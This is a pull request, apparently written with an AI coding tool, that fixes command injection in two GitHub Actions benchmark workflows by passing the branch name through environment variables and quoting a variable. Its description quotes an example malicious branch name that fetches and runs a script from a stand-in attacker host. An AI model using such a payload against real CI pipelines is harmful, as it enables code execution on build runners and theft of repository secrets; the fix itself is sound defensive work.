### PR TITLE
Fix command injection vulnerability in GitHub workflows

### DIFF
--- a/.github/workflows/benchmark-cleanup.yml
+++ b/.github/workflows/benchmark-cleanup.yml
@@ -17,8 +17,10 @@ jobs:
           fetch-depth: 0
 
       - name: Determine benchmark directory
+        env:
+          branch_name: "${{ github.head_ref }}"
         run: |
-          BRANCH_NAME=$(echo "${{ github.head_ref }}" | sed 's|/|--|g')
+          BRANCH_NAME=$(echo "$branch_name" | sed 's|/|--|g')
           BENCHMARK_DIR="benchmark_results/$BRANCH_NAME"
           echo "BENCHMARK_DIR=$BENCHMARK_DIR" >> "$GITHUB_ENV"
           echo "Benchmark directory set to $BENCHMARK_DIR"

--- a/.github/workflows/benchmark.yml
+++ b/.github/workflows/benchmark.yml
@@ -22,9 +22,11 @@ jobs:
         run: go test -bench=. ./... | tee output.txt
 
       - name: Set benchmark directory
+        env:
+          branch_name: "${{ github.head_ref }}"
         run: |
           set -exuo pipefail
-          BRANCH_NAME=$(echo "${{ github.head_ref }}" | sed 's|/|--|g')
+          BRANCH_NAME=$(echo "$branch_name" | sed 's|/|--|g')
           if [ "${{ github.event_name }}" = "push" ]; then
             BENCHMARK_DIR="benchmark_results/main"
           else
@@ -42,7 +44,7 @@ jobs:
           git checkout benchmark-results
           if [ ! -d "$BENCHMARK_DIR" ]; then
             echo "Creating new directory: $BENCHMARK_DIR"
-            mkdir -p $BENCHMARK_DIR
+            mkdir -p "$BENCHMARK_DIR"
             cp -r benchmark_results/main/* "$BENCHMARK_DIR"/
             git config --global user.name "github-actions[bot]"
             git config --global user.email "github-actions[bot]@users.noreply.github.com"


### PR DESCRIPTION
## Summary
- Security fix: Prevent command injection in benchmark workflows by using environment variables instead of direct interpolation of GitHub expressions
- Pass `github.head_ref` through env variables to prevent malicious branch names from executing arbitrary commands
- Quote `BENCHMARK_DIR` variable in mkdir command for additional safety

## Security Impact
This prevents attackers from using specially crafted branch names like `$({curl,evil.com}|sh)` to execute arbitrary code during workflow runs.

## Changes
- Added `env:` blocks to pass GitHub expressions as environment variables
- Updated shell commands to use the environment variables instead of direct interpolation
- Added proper quoting for the `mkdir -p` command

## Test plan
- [ ] Verify workflows still run correctly with normal branch names
- [ ] Confirm the security vulnerability is patched by reviewing the diffs

🤖 Generated with [Claude Code](https://claude.ai/code)